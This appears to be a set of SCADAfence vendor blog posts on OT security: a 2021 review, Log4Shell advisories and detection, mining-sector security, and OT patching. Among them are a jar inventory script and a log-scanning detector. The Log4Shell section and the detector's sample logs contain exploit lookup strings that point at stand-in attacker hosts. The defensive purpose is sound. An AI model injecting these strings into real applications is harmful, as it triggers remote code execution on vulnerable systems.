
A Review of OT Security in 2021 with SCADAfence

As 2021 draws to a close, it is time for our customary round-up of the year’s industry-changing cyber attacks, product and company updates, and SCADAfence’s achievements.

A Landmark Year for SCADAfence

Before we get into the year’s industry and product news, 2021 has been an astonishing year for us at SCADAfence. To start off the year, we unveiled our strategic partnership with Rapid7, which was followed by many partnerships with industry leaders such as Keysight Technologies, BDO, Fujitsu, NCC and others. Then came recognition from SC Media, which named SCADAfence the Best SCADA Security Solution for 2021, and from Frost & Sullivan, which announced SCADAfence as a leader in its 2021 Frost Radar for the Critical Infrastructure Cyber Security Market report. On that note, we want to thank all our employees, customers, partners, distributors and investors for helping us reach milestones we couldn’t have dreamed of.

OT Security in the Spotlight

2021 started out with the entire security community recovering from the aftermath of the massive SolarWinds campaign. Just a few weeks later, news broke that a water treatment plant in Oldsmar, Florida, was under attack, although the security team quickly thwarted it. The attacker briefly raised the amount of sodium hydroxide, the main ingredient in liquid drain cleaners, being added to the water supply from 100 parts per million to 11,100 parts per million. That change was undone almost immediately and the public was never at risk in this case, but it is a sharp lesson in just how important OT security is in 2021 and beyond.

Over the next six months, the OT security industry was reminded that 2021 was the year of ransomware. Some of the ransomware attacks were so colossal that they grabbed national headlines for the impact they had on civilians’ daily lives. In early May, a ransomware attack on Colonial Pipeline, a major East Coast fuel supplier, demonstrated the security risks of attackers exploiting IT networks to reach OT infrastructure. Shortly after, in June, meat producer JBS USA paid an $11 million ransom after attackers shut down operations at five of its beef-processing plants.

It has been a turbulent year of attacks affecting the OT security landscape, and just two weeks ago we moved on to yet another threat, one that could last for years. There is really no way to predict where threat actors will head in 2022, but we expect ransomware attacks on critical infrastructure to keep rising.

Major SCADAfence Product Updates  

With SCADAfence’s product, R&D and security research teams working tirelessly, SCADAfence development saw several milestones. Perhaps most important was the enhancement of our Governance Portal with a complete UI facelift that delivers faster and more advanced results and broader coverage of compliance regulations. Today, our Governance Portal has become a significant contributor to the company’s revenue growth, driven by customer and market demand and by the cybersecurity executive order issued by United States President Joe Biden.

SCADAfence’s Multi-Site Portal also saw a major update: customers can now distribute their configurations from the Multi-Site Portal to the distributed SCADAfence Platforms at all their sites. The security configuration is managed via profiles and covers many security aspects, including alert policy, IP groups, central licensing, third-party tool integrations, and more. By deploying a central configuration, administrators save time while increasing productivity and efficiency when using the SCADAfence Platform across their multiple sites.

An additional product offering that we launched near the end of 2021 was SCADAfence’s Managed Services for OT security. Now industrial organizations can enable their OT security with minimal effort. Our OT security experts deliver the expertise and technology that is needed to effectively control OT networks with visibility, risk management, and vulnerability detection.

And, as usual, there were many equally important additions, such as feature updates, new integrations, performance improvements, and more.

2021, A Banner Year for SCADAfence

With 2022 right around the corner, we can’t forget the trend-setting year that was 2021. Here at SCADAfence, 2021 was a fruitful year of growth and opportunity, which included quadrupling our yearly revenue and doubling our customer base over the last year. We accelerated the expansion of our global customer base across a diverse set of industries – including manufacturing, water treatment, critical infrastructure, oil and gas, pharmaceuticals, chemicals, and building management systems (BMS).

As a company, we moved to a beautiful new office in Ramat Gan and we recruited several industry-leading OT security experts from leading cybersecurity organizations to grow our sales, sales engineering and strategy team. We’ll share some more on that in future posts.

To a More Secure Year Ahead 

We hope this recap of 2021 at SCADAfence helps you see the larger trends in OT security and what our product has to offer. Stay tuned for more blog posts, news articles and innovative product updates in the upcoming year, which will continue to examine the new and emerging OT security trends we should all focus on.

As we conclude, we’d like to thank all our customers, employees, partners, investors and everyone who supported us this year. We couldn’t have done it without you, and look forward to continuing to collaborate with you!

Happy New Year!

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, points of sale, resellers, and partner companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which includes Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About SCADAfence
SCADAfence helps companies with large-scale operational technology (OT) networks embrace the benefits of industrial IoT by reducing cyber risks and mitigating operational threats. Our non-intrusive platform provides full coverage of large-scale networks, offering best-in-class detection accuracy, asset discovery and user experience. The platform seamlessly integrates OT security within existing security operations, bridging the IT/OT convergence gap. SCADAfence secures OT networks in manufacturing, building management and critical infrastructure industries. We deliver security and visibility for some of the world’s most complex OT networks, including Europe’s largest manufacturing facility. With SCADAfence, companies can operate securely, reliably and efficiently as they go through the digital transformation journey.

Detecting and Alerting on Log4j with the SCADAfence Platform

Until two weeks ago, Log4j was just a popular Java logging framework, one of the numerous components that run in the background of many modern web applications. But since a zero-day vulnerability (CVE-2021-44228) was published, Log4j has made a huge impact on the security community as researchers found that it’s vulnerable to arbitrary code execution. 

The good news is that the Apache Software Foundation has already fixed and rolled out the patch for the vulnerability. On top of the patch, thanks to SCADAfence’s research and R&D team, our latest build supports the detection of Log4j exploit attempts.

Quick Recap of CVE-2021-44228 in Log4j

The Log4j vulnerability (CVE-2021-44228) is an unauthenticated remote code execution (RCE, code injection) vulnerability in the popular Log4j logging framework for Java. By exploiting it, an attacker can easily execute code from a remote source on the targeted system. NIST has given this vulnerability a score of 10 out of 10, which reflects its criticality.

Over 3 billion devices run Java, and because there are only a handful of logging libraries, many of them are likely to run Log4j. Worse still, many internet-exposed target applications can be exploited by external users without authentication. 

Over the past two weeks, major OT vendors disclosed the security impact of this vulnerability on their software and equipment, and additional disclosures will continue as vendors work to identify the use of Log4j across their product lines. Initially, the Log4j vulnerability made it challenging to identify potentially impacted servers on a given network. For OT networks that have implemented network segmentation, the risk can be mitigated to an extent.

How To Ensure That Your Systems Are Safe

First, it’s important to understand that the root cause of this issue lies within the Log4j library. The Apache Software Foundation released an emergency patch for the vulnerability. You should upgrade your systems to Log4j 2.15.0 immediately or apply the appropriate mitigations.
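As an added example of a practical first step (this is not SCADAfence’s code and not from the original post), the following Python script walks a directory tree, opens each .jar with the standard library, reads the Maven pom.properties that log4j-core jars carry, and reports any copy below the 2.15.0 fix level named above that still contains the JndiLookup class (the class Apache’s published mitigation removes). The sample jars it builds in a temporary directory are constructed test data; the directory layout and file names are assumptions.

```python
"""
Local inventory check for Log4j 2 jars (added example, not SCADAfence's code).

Walks a directory tree, opens every .jar with the standard zipfile module, reads
the Maven pom.properties that log4j-core jars carry, and reports whether the
version is below the fix level the post names (2.15.0) and whether the
JndiLookup class, which Apache's published mitigation removes, is still present.
"""
import os
import tempfile
import zipfile
from pathlib import Path

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
FIXED_VERSION = (2, 15, 0)  # fix level stated in the post; pass a higher tuple if your policy differs


def parse_version(text):
    """Turn '2.14.1' into (2, 14, 1); a trailing qualifier such as '-rc1' is dropped."""
    parts = []
    for piece in text.strip().split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        if not digits:
            break
        parts.append(int(digits))
    return tuple(parts)


def inspect_jar(path, fixed=FIXED_VERSION):
    """Return a finding dict for a log4j-core jar, or None if the file is not one."""
    try:
        with zipfile.ZipFile(path) as jar:
            names = set(jar.namelist())
            if POM_PROPS not in names:
                return None
            props = jar.read(POM_PROPS).decode("utf-8", "replace")
    except zipfile.BadZipFile:
        return None  # not a valid archive; nothing to inspect
    version = None
    for line in props.splitlines():
        if line.startswith("version="):
            version = line.split("=", 1)[1].strip()
    parsed = parse_version(version or "")
    return {
        "path": str(path),
        "version": version,
        "below_fix": bool(parsed) and parsed < fixed,
        "jndi_lookup_present": JNDI_LOOKUP in names,
    }


def scan_for_log4j(root, fixed=FIXED_VERSION):
    """Walk root and collect findings for every log4j-core jar found."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".jar"):
                finding = inspect_jar(Path(dirpath) / name, fixed)
                if finding:
                    findings.append(finding)
    return findings


def needs_action(finding):
    """A jar needs action if it is below the fix level and still ships JndiLookup."""
    return finding["below_fix"] and finding["jndi_lookup_present"]


def build_sample_tree(root):
    """Create constructed sample jars (test data, not real artefacts) under root."""
    def make_jar(path, version, include_lookup):
        with zipfile.ZipFile(path, "w") as jar:
            jar.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\n"
                                    f"artifactId=log4j-core\nversion={version}\n")
            if include_lookup:
                jar.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # placeholder bytes, not a real class

    root = Path(root)
    (root / "app1" / "lib").mkdir(parents=True)
    (root / "app2").mkdir(parents=True)
    make_jar(root / "app1" / "lib" / "log4j-core-2.14.1.jar", "2.14.1", True)    # vulnerable
    make_jar(root / "app2" / "log4j-core-2.15.0.jar", "2.15.0", True)            # at fix level
    make_jar(root / "app2" / "log4j-core-2.14.1-mitigated.jar", "2.14.1", False)  # class removed
    with zipfile.ZipFile(root / "app2" / "other.jar", "w") as jar:              # unrelated jar
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
    (root / "app2" / "broken.jar").write_text("not an archive")                 # corrupt file
    return root


def demo():
    """Build the sample tree in a temp dir, scan it, return findings keyed by file name."""
    with tempfile.TemporaryDirectory() as tmp:
        root = build_sample_tree(tmp)
        return {os.path.basename(f["path"]): f for f in scan_for_log4j(root)}


if __name__ == "__main__":
    for name, finding in sorted(demo().items()):
        status = "ACTION NEEDED" if needs_action(finding) else "ok"
        print(f"{status}: {name} version={finding['version']}")
```

Run it against a real host by calling scan_for_log4j("/opt") (or wherever your Java applications live) instead of demo(). It only opens top-level jars: a log4j-core copy bundled inside a fat jar, WAR or EAR would need the nested archive opened as well, which is the usual blind spot of file-name-only scans.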

Our OT security threat intelligence database learns the different behaviors involved, highlights activity attempting to leverage this vulnerability and provides remediation guidance. Our customers are notified of Log4j exploit attempts, and also of any anomaly detected by our anomaly engine; in fact, our customers are already protected simply on the strength of our anomaly detection.

The SCADAfence Platform, the Governance Portal, and the Multi-Site Portal do not use Log4J or the Apache server, and thus SCADAfence product installations are updated and secure from the Log4J vulnerability. Customers do not need to take action for any of our on-prem or hosted web solutions.

At SCADAfence, we felt network segmentation wasn’t enough to fight off this critical vulnerability. The latest build of the SCADAfence Platform detects exploit attempts and allows SCADAfence customers to leverage our OT security threat intelligence service to ensure they can patch and mitigate this exploit in any of their OT devices.


The SCADAfence Platform Detects & Alerts if an OT Asset is Vulnerable to the Log4Shell Vulnerability

We’ve updated our Log4Shell/Log4j exploit detection inside the SCADAfence Platform as the situation has evolved. We added CVE signatures to our database that detect and alert on RCE (Remote Code Execution) exploits.

The following CVEs were added to the SCADAfence database to correlate and alert of vulnerable OT assets: 

  1. CVE-2021-44228   
  2. CVE-2021-45046 
  3. CVE-2021-4104
  4. CVE-2020-9488
  5. CVE-2019-17571
  6. CVE-2017-5645

How Can You Deploy The Latest Version of SCADAfence

The latest version of the SCADAfence Platform which detects the CVE signatures relating to the vulnerability is available in build 6.6.1.167. To get the latest version, please contact your customer success representative.

If your organization is looking into securing its industrial networks, the experts at SCADAfence are seasoned veterans in this space and can show you how it’s done. 

To learn more about SCADAfence’s array of OT & IoT security products, and to see short product demos, click here: https://l.scadafence.com/demo


SCADAfence Update on the Log4Shell Vulnerability

December 10, 2021, will always be remembered by the security community as the day a highly critical zero-day vulnerability was found in log4j, the very popular logging library for Java applications, and identified as CVE-2021-44228. Not long after it was identified, the name “Log4Shell” was coined for the exploit, and every organization, no matter its size, including every security vendor, rushed to mitigate the zero-day vulnerability within its applications. This patching marathon is still a work in progress as we speak.

Log4Shell is a critical vulnerability that requires urgent action. We can’t stress enough how important this Log4Shell vulnerability is. It’s a critical security vulnerability with a CVSS score of 10 that allows attackers to execute code remotely in any vulnerable environment. 

If you have not mitigated the Log4Shell vulnerability, we strongly recommend upgrading to the latest v2 version of Log4j which includes the recent vulnerability fix. You can find the mitigation process in Apache’s official Migration from Log4j v1 document. If you are unable to upgrade to the latest version, our research team recommends disabling JMSAppender or blocking any user input from reaching its configuration.

How the Log4Shell Vulnerability Works

The Log4Shell vulnerability targets the parts of Log4j that parse and log user-controlled data. Log4Shell allows attackers to exploit and compromise vulnerable applications. The vulnerability takes advantage of Log4j’s ability to use JNDI, the Java Naming and Directory Interface. By using JNDI lookups, an attacker can force the vulnerable application to connect to an attacker-controlled LDAP (Lightweight Directory Access Protocol) server and issue a malicious payload. Here is a visual diagram of the attack chain from the Swiss Government Computer Emergency Response Team.

[Figure: SCADAfence-log4shell-diagram, the Log4Shell attack chain]

To exploit a vulnerable target, attackers must trick the application code into writing a log entry that includes a string such as ${jndi:ldap://evil.xa/x}. For many applications logging is essential, and a great deal of information about every incoming request is logged. The vulnerability is reachable through many attack vectors, and until mitigation steps and patching are complete, no application or attack vector is safe from Log4Shell.
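The lookup string described above is also what a defender can search for. The following Python scanner, added here as an example and not SCADAfence’s detection logic or code from the original post, runs over access-log lines, finds JNDI lookup strings in the logged request fields, extracts the callback host for an egress block list, and emits one alert record per hit. It generalizes the post’s single ldap case to the other JNDI URL schemes the same lookup syntax accepts. The sample log lines are constructed; evil.xa is the host from the post, while attacker.example is a constructed placeholder.

```python
"""
Detection of Log4Shell lookup strings in application logs (added example; this is
not SCADAfence's detection logic and not code from the original post).

The post explains that the exploit needs a string such as ${jndi:ldap://evil.xa/x}
to reach a logged field. This scanner searches log lines for that pattern,
extracts the callback host so it can be blocked at the egress firewall, and
emits one alert record per hit.
"""
import re
from urllib.parse import urlsplit

# ldap is the scheme the post names. ldaps, rmi, dns and iiop are other JNDI
# providers the same lookup syntax can reference; including them is a
# generalization of the post's single example.
JNDI_PATTERN = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>ldaps?|rmi|dns|iiop)\s*:(?P<rest>[^}]*)\}",
    re.IGNORECASE,
)

# Constructed sample access-log lines (not real traffic). Line 2 carries the
# exact string from the post in its User-Agent field; line 3 is an upper-case
# variant with a constructed placeholder host; line 4 is a non-JNDI Log4j
# lookup that must not fire.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:01:03 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:01:07 +0000] "GET / HTTP/1.1" 200 321 "-" "${jndi:ldap://evil.xa/x}"',
    '10.0.0.9 - - [10/Dec/2021:12:01:09 +0000] "GET /api HTTP/1.1" 404 12 "-" "${JNDI:rmi://attacker.example:1099/obj}"',
    '10.0.0.7 - - [10/Dec/2021:12:01:11 +0000] "GET /status HTTP/1.1" 200 44 "-" "${java:version}"',
]


def find_jndi_lookups(line):
    """Return one alert dict per JNDI lookup string found in a single log line."""
    alerts = []
    for match in JNDI_PATTERN.finditer(line):
        # Rebuild the URL with a lower-cased scheme so urlsplit can pull out host and port.
        url = f"{match.group('scheme').lower()}:{match.group('rest').strip()}"
        parts = urlsplit(url)
        alerts.append({
            "scheme": parts.scheme,
            "host": parts.hostname,
            "port": parts.port,
            "raw": match.group(0),
        })
    return alerts


def scan_log(lines):
    """Scan an iterable of log lines; each alert carries the 1-based line number."""
    alerts = []
    for number, line in enumerate(lines, start=1):
        for alert in find_jndi_lookups(line):
            alert["line"] = number
            alerts.append(alert)
    return alerts


def callback_hosts(alerts):
    """Sorted, de-duplicated list of callback hosts for an egress block list."""
    return sorted({a["host"] for a in alerts if a["host"]})


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for hit in hits:
        print(f"line {hit['line']}: {hit['scheme']}://{hit['host']} ({hit['raw']})")
    print("block outbound to:", ", ".join(callback_hosts(hits)))
```

This literal pattern catches the plain form shown in the post; obfuscated variants of the lookup string exist and will slip past a regex like this, which is why it belongs alongside, not instead of, network-level detection of the unexpected outbound LDAP or RMI connection the exploit depends on.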

ICS/OT industry Response to Log4Shell

When the exploitation was first reported the ICS/OT industry didn’t think they were affected but now the ICS manufacturers are rushing to respond to Log4Shell.

Siemens confirmed that 17 of its products were affected by CVE-2021-44228 and that they have started to release patches and provide mitigation advice. Products confirmed to be affected include E-Car OC, EnergyIP, Geolus, Industrial Edge Management, Logo! Soft Comfort, Mendix, MindSphere, Operation Scheduler, Siguard DSA, Simatic WinCC, SiPass, Siveillance, Solid Edge, and Spectrum Power.

Additionally, Schneider Electric also released an advisory, but announced that it is still determining which of its products are affected. Inductive Automation, which provides SCADA software and industrial automation solutions, announced that it conducted a full audit and determined that its products are not impacted.

While OT/ICS vendors are responding to Log4Shell and publishing advisories, this is not enough to ensure that OT environments and devices are secure against the Log4Shell vulnerability. As OT networks become increasingly connected, the attack surface widens and risk is likely to increase. And unlike in IT, OT environments have much more at stake. To ensure this vulnerability won’t cause more harm than necessary, organizations should look into network segmentation in their OT environments. This will decrease the chance that their OT devices and networks will be exploited via the Log4Shell vulnerability.

Too often, OT devices are outdated and no latest version or upgrade is offered for them, which allows attackers to exploit an OT environment easily. Where OT vendors do provide the latest patch or upgrade, organizations need to upgrade their OT technology. However, OT teams sometimes won’t update their technology to the secure version because of a “don’t fix what’s not broken” approach. This outdated and passive approach can turn the organization’s OT infrastructure into an easy target for attackers.

SCADAfence’s OT Security is Here to Help

First of all, at SCADAfence we are here to assure you that all our products (the SCADAfence Platform for OT Security, the Governance Platform, and the Multi-Site Platform) are updated and secure from the Log4Shell vulnerability. We remediated the Log4Shell vulnerability in our deployed application services’ code. Customers do not need to take action for any of our hosted web solutions.


The SCADAfence Platform Detects & Alerts if an OT Asset is Vulnerable to the Log4Shell Vulnerability

On top of ensuring that our products are secure, SCADAfence’s researchers analyzed the vulnerability, and the SCADAfence Platform now detects and alerts if an OT asset is vulnerable to the Log4Shell zero-day vulnerability. SCADAfence customers can leverage our OT security threat intelligence service to ensure they can patch and mitigate this exploit in any of their OT devices.

On top of offering OT security threat intelligence, SCADAfence enables organizations to increase their visibility into their entire network, as it’s difficult to protect what you cannot see. Additional recommended practices are to adopt security network monitoring solutions that provide network segmentation and micro-segmentation, as this will help organizations prevent similar exploitation going forward.

Still Patch, Patch, Patch 

Patching is still your best bet to combat this vulnerability. If patching isn’t possible, implementing mitigation techniques is the next best path to minimize the attack surface. SCADAfence’s research team is monitoring the evolution of this vulnerability and will provide additional information and support as needed. 

If your organization is looking into securing its industrial networks, the OT & IoT cyber security experts at SCADAfence are seasoned veterans in this space and can show you how it’s done. 

To learn more about SCADAfence’s array of OT & IoT security products, and to see short product demos, click here: https://l.scadafence.com/demo


Simplifying Cybersecurity for the Mining Industry

The COVID-19 pandemic has been detrimental to the world economy while flattening many industries. The mining industry was fortunate to be one of the very few industries to deliver exceptional growth throughout this period. Yet this growth has marked the mining industry out as a lucrative target for cybercriminals.

Cybercrime has increased over the course of the pandemic as threat actors try to take advantage of the rapidly changing circumstances, misinformation, and organizations’ shift to a hybrid workplace. The rewards for successful cyber-attacks are staggering. To put this in perspective, it is currently estimated that cyber-crime is worth more than the illegal drug trade globally, with billions of dollars paid out each year in ransomware. Cybercrime continues to accelerate and is expected to cost 10.5 trillion USD annually by 2025.

Cybercriminals are also becoming more innovative and creative as they target complex, business-critical Operational Technology (OT) environments, including Industrial Control Systems (ICS) and Supervisory Control And Data Acquisition (SCADA) systems.

Several high-profile attacks have demonstrated both the increasing sophistication of attacks and the devastating effects of a breach in these environments. In 2010 a malicious worm traveled for years to eventually find its SCADA target at an Iranian nuclear plant. More recently, in February 2021, a hacker attempted to poison the water supply of Oldsmar in Florida by using remote access to alter the levels of sodium hydroxide in the water. Though the attempt was thwarted, it illustrated the threat to industrial control systems. Then in May, hackers successfully gained entry into the Colonial Pipeline Company network, which led to the shutdown of its 5,500-mile fuel pipeline, a shortage of petroleum in the USA and a ransom pay-out of $5.6 million.

The rapid shift to remote work during the lockdown, and the consequential increase in cyber threats arising from the greater attack surface, have increased the demand for cybersecurity skills. Combined with the existing global shortage of cyber expertise, this demand means many organizations struggle to find and keep the people required to effectively manage security governance and operations across IT/OT environments. In response, we are now seeing increasing adoption of managed security services such as managed detection and response (MDR) solutions and vulnerability and threat identification tools designed specifically for OT systems.

Targeted mining attacks have the potential to affect four parts of operations: extraction, processing/refinement, stock management, and shipping. Each function presents a different set of risks that, if exploited, can reduce efficiency, inhibit operations, and cause financial turmoil. Given the extremely dangerous environments that mine sites present – heavy machinery, fumes, and explosives – the effect of a cyberattack on safety technologies such as wearables and gas detectors is possibly the most severe example.

Understanding the OT Environment 

Security analysts need to understand what is happening within OT systems with a unified system that monitors and assesses both OT and traditional IT environments. Complete coverage of an industrial mining network must include continuous monitoring of the components within the industrial network, such as programmable logic controllers or remote terminal units. Companies need to be continually monitoring governance and compliance aligned to industry good practice and ensuring coverage extends to IoT devices and machinery.

With such complex environments, many mining companies face an increasingly complex task to manage their cybersecurity. It is not uncommon to see companies procure half-a-dozen or more solutions. In fact, one study found 40% of organizations use 10 to 25 separate security tools, and 30% use 26 to 50 tools. This only adds to security teams’ burden. Furthermore, traditional security tools often don’t provide the required visibility into OT networks and devices that companies need to operate.

The key to managing this complexity and simplifying security is to bring network visibility, asset monitoring, vulnerability management, threat intelligence and threat detection into one solution. Security teams can focus on identifying, understanding, and remediating issues rather than managing data and tools. Tooling that is OT-specific and run by professionals who understand the nuances of OT environments is key.

Industry-leading OT security

At Rapid7, we know cyber security. We have two decades of experience in helping organizations advance their security postures and have assisted in increasing customers’ cyber security maturity. Our solutions are built to incorporate the change in modern environments, including the continued convergence of OT, and we offer clarity of risk, while helping secure your entire attack surface.

At Rapid7, we provide targeted threat detection through our External Threat Intelligence platform, allowing you to leverage tailored and actionable intelligence based on unique digital assets. This enables you to identify, block, and takedown attacks that directly target your industry and digital operations.

For example, you can identify new malware kits and exploits that target production line equipment or OT devices, or monitor hacker chatter to prioritize and lock down vulnerabilities before they are exploited.

To expand the power of our solution in OT environments, we have partnered with the award-winning SCADAfence team to develop deep integrations between the two platforms to meet IT and OT security needs. Security teams now have a consolidated solution for IT, OT and IoT vulnerability management, threat intelligence, and incident detection and response.

SCADAfence is an industrial cybersecurity solution that provides visibility and monitoring for the mining industry’s OT & IoT networks. SCADAfence was recently recognized as Frost & Sullivan’s 2021 entrepreneurial company of the year, not to mention positioned as a Leader in the new Frost & Sullivan Radar for the Global Critical Infrastructure cyber security market. SCADAfence also won three coveted global infosec awards at the RSA conference, including ICS/SCADA market leader.

SCADAfence’s solution automates asset discovery and inventory management, as well as threat detection and risk management. Remote access security capabilities enable security teams to track user activities and detect those that are outside the user profile or are malicious in nature.

By employing a wide range of algorithms, machine learning and AI, the platform detects anomalies and security events that can compromise availability and affect the safety and reliability of the OT network and its assets. A governance portal also measures compliance across all sites and identifies gaps or bottlenecks to help improve organizational security at scale.

SCADAfence provides 100% deep packet inspection of all SCADA/ICS/IoT device traffic out of band, and offers Governance and Compliance modules for ISO, NERC/CIP, EU and many other standard compliance models, providing a seamless reporting mechanism on the cyber security posture within OT environments. This ensures that reporting requirements align with your defined security frameworks.

A Consolidated Approach to Mining OT security

Rapid7 has integrated SCADAfence’s specialized OT monitoring with our industry-leading Insight platform to provide a comprehensive security solution without overwhelming your teams. The integration works bi-directionally and adds great security and manageability. Vulnerability data is collected from across the corporate IT and OT environments and provides visibility in a single interface for a comprehensive insight into IT/OT vulnerabilities.

Threats identified within the OT environment are communicated to teams via a central Security Information and Event Management (SIEM) solution (e.g. Rapid7’s InsightIDR). This, combined with the centralized vulnerability information, is what provides the single interface of all identified vulnerabilities and threats within the IT/OT environments.

The Rapid7 XDR solution (InsightIDR) ingests all your IT/OT threat data, as well as network traffic analysis (NTA), user and entity behavior analytics (UEBA) and endpoint detection and response (EDR) data, to provide a complete view of your environment’s attack surface.

The XDR solution provides security teams with a single, centralized solution that can quickly identify malicious behavior across your entire environment.

In addition, with Rapid7 IntSights, our Threat Intelligence (TI) solution can also look for external threats from the clear, deep, and dark web, picking up industry targeted attacks, leaked company credentials, brand impersonation, executive impersonation and much, much more.

As a result, mining companies now have a single consolidated solution for IT/OT/IoT security, vulnerability management, threat intelligence, extended detection and response, and security orchestration and automation.

Opinion Disclaimer

The views and opinions expressed in this post are those of the author and do not represent the official policy or position of SCADAfence.

This article was originally published in the Australian Mining Review and is authored by John Rice, Account Executive at Rapid7.

The original post can be found here: https://australianminingreview.com.au/latest/#page=88


This Thanksgiving, Be Thankful for OT Security

Thanksgiving – when families get together and express gratitude for everything they have over some food and hopefully some football. For most families and especially security teams, this is a time for looking back to evaluate the past year and to give thanks for how far we’ve come. 

When looking back at the past 12 months for the OT security community, it was a challenging year, as the industry was bombarded with an increasing number of successful ransomware attacks on industrial and critical infrastructure organizations. Instead of highlighting the attacks, we believe it is better to focus on the different aspects of OT security that we are truly thankful for.

Here at SCADAfence, we are grateful for all the efforts and innovation put in by our team and the collective OT security community. The sleepless nights and ongoing devotion to improving OT network visibility and security for industrial organizations is something everyone can be thankful for this Thanksgiving.

From the increasing awareness of IT-OT convergence to the US Government emphasizing the security risks that relate to OT environments, 2021 is a clear example that OT security is headed in the right direction and gaining awareness among board members and C-level executives worldwide.

As we look at last year and move forward, here are the 5 reasons why we are thankful for OT security. 

IT-OT Convergence

Just like on Thanksgiving, some family members might not see eye to eye at first but by the end of the night, everyone is happy and in agreement. This yearly experience is very relatable for security experts in IT and OT teams as they need to work together when it comes to the responsibility of OT security and converging networks.  

Until recently, IT and OT teams rarely worked together, as OT teams were not responsible for advanced threats or IT security. With the advancement of operational technology and the adoption of industrial IoT devices, converging IT and OT networks and systems is becoming more popular by the day among industrial organizations.

With the increasing use of IP-based communications with OT devices, IT and OT teams face a bigger challenge in understanding who is in charge of securing OT systems, and this has created a cultural divide between teams. Technical barriers between IT and OT teams and the lack of clear ownership are the key reasons why the teams are less open to working together. While awareness of this challenge is increasing, we are seeing more organizations invest in technologies and governance platforms to ensure improved collaboration, as they see that proper IT-OT convergence is a crucial aspect of their cyber security program.

Similar to families making up at the end of Thanksgiving dinner, when IT and OT teams come to the same table, the result can be improved visibility and transparency across an organization's complete network security. At SCADAfence we have seen many of our customers adopt a seamless IT-OT convergence approach, including one of the leading oil and gas organizations, which now has complete network visibility into all 71 of its global production sites.

OT Detection & Response

As industrial organizations become more interconnected, they potentially have more exposure to vulnerabilities. The high cost of industrial equipment and the damages to communities and economies that an attack could cause are key factors for organizations who are looking to protect their industrial networks. In addition, aging legacy equipment in factories, safety regulations that forbid any modifications being made to equipment and industry compliance regulations have created quite the challenge for OT teams.

Despite all of this, it is possible to secure industrial networks without disturbing regular operations and without risking non-compliance. By using OT security solutions that provide continuous threat detection and establishing the right security policies, OT security teams can put an effective OT strategy in place that will protect their organization’s processes, people and profit while significantly reducing security incidents and vulnerabilities.

Asset Inventory Management 

Effective cyber security in OT requires a deep foundation of asset information. Until recently, OT teams did not have the resources or tools to maintain such an asset inventory. When organizations do not deploy asset inventory management within an OT environment, it creates a major visibility hole, as they will not know the security status of their environments.

In some cases, industrial organizations will only create a simplified asset inventory that collects the data needed for specific security tasks. Organizations need to change their approach to asset inventory management and see it as the foundation of their OT security program.

When detecting new vulnerabilities in OT networks and devices, organizations rely on their asset inventory to decide the severity of the vulnerability, how to patch the device and how it affects their environments. With an automated asset inventory, industrial organizations will increase the productivity and efficiency of their OT teams by quickly managing their asset data to detect and protect their environments, all in one dashboard.

Governance and Compliance 

Compliance regulations in OT are another aspect for security leaders to be thankful for, as they are crucial for the security and production of industrial organizations. In recent years, there has been a growing demand for standards and guidelines to manage the risk exposure of OT infrastructures. IT and OT departments, who typically manage the cyber security standards across the organization, are now required to monitor compliance with these standards across the various OT locations. On the other hand, the information provided today by the various IT tools is dispersed and technical in nature. This makes translating it into risks and prioritizing actionable mitigations very challenging and time-consuming.

Organizations need to automate governance processes with a solution that enables the IT and OT departments to centrally define and monitor organizational adherence to internal policies and to OT-related regulations. The solution should be configured and managed from a central location and aggregate compliance information from all sites in the organization. It should also connect to other security systems, providing a cross-organizational, comprehensive compliance posture.

OT Remote Access

Industrial organizations have undergone an evolution: most OT environments were once isolated systems, and now most OT systems are connected to the internet. This is occurring because organizations are deploying new technology that allows increased remote access to OT systems.

Providing remote access to OT systems gives industrial organizations an advantage, but it also comes with more risk. Increasing the connectivity of OT systems and devices to the internet can result in exploitation via cyber attacks. The constant increase of attacks on critical infrastructure and the convergence of IT and OT systems have quickly increased the adoption of remote access security in critical infrastructure and industrial organizations.

To counter remote access security risks within OT environments, organizations need to deploy OT security solutions that come integrated with remote access features specifically designed for OT environments. Deploying an OT security platform that integrates remote access security without requiring any changes to the network architecture ensures that OT systems are properly configured to detect and correlate remote user activity and to detect any malicious network activity.

Lastly, all of us at SCADAfence would like to thank our readers. It’s a privilege to share our passion for a subject with fellow security-minded folks. We wish everyone who’s celebrating a safe and happy Thanksgiving!


To Patch or Not to Patch in OT

When organizations are seeking out the right cybersecurity controls for their OT environments and devices, the clear objective is to decrease and eliminate risks. Too often organizations only adopt the minimal level of security. While each organization defines its security risk levels, it is often based on their production environments, industrial devices and the critical risk factor of their facility production.


Many organizations will use different techniques to manage their risks, but one of the most common methods is patching. At the heart of every security strategy, patching is one of the key elements to securing any potential vulnerabilities within an organization. Despite patching being commonly used in risk management strategies, advancing patching for OT devices is still a work in progress.

Patch management in OT and Industrial Control Systems (ICS) comes with many security challenges. Between a lack of OT experts, proprietary hardware and software, compliance reporting requirements, minimal testing equipment and ongoing device and system maintenance, many industrial organizations struggle to clearly understand how to patch their vulnerable devices. This results in unmanaged patches.

Industrial Device Vulnerability Management Processes

When deciding what needs to be patched, security teams need to evaluate the practicality of OT patching for their organization. In OT environments, applying patches is a balance between the security benefit the patch provides and the disruption to operational activities that patching causes. Both are crucial factors to consider when patching OT environments.

